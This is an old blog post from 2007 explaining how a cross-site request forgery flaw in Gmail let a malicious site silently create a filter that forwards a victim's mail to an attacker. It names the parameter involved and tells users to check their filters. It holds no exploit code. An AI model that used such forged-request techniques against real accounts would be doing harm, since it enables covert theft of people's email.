Poor man's view of the world

As of 27th September 2007 – yes!

A malicious hacker can misuse Cross-site request forgery (CSRF) to redirect a copy of all your incoming emails to his account! CSRF is also referred to as "one click attack" or "session riding".

[Before you read any further please understand gmail filters by logging into your gmail account and going to Settings – Filters.]

CSRF is a malicious attack that transmits unauthorized commands to a website from a trusted user. Lets take a simple example to understand this:

  1. Pooja is checking her email on a very safe computer (totally patched, fire-walled, with the latest updated antivirus etc etc) using a very safe browser.
  2. Because she is logged in to gmail, the gmail authentication cookie is present on her machine.
  3. She receives an email from Priyanka containing a really funny joke. The email contains a link to a site which promises her lots more funny stuff. She clicks on the link and is very happy with the site that opens up.
  4. What she does not realize is that this joke site has forged a POST request to the gmail “Create Filter” wizard. This creates a filter that forwards a copy of all emails coming into Pooja’s account to Priyanka!
  5. Gmail accepts the request to create the filter because the genuine gmail account holder (Pooja) is authenticated and logged in at the moment and her session cookie is passed along with the forged request.
  6. This new gmail filter will keep stealing Pooja’s emails till she manually checks her filters and realizes that there is an unauthorized one.

I carried out a small experiment wherein I requested for a filter to forward all emails to a particular account. On analyzing the data trasnfer between my browser and gmail (using Tamper Data extension for Firefox) I found that the relevant GET parameter is cf2_email.

See the following for more information on this -

Many thanks to Giorgio Maone for his post on this issue. As Georgio says - this exploit is "Very clever and very dangerous."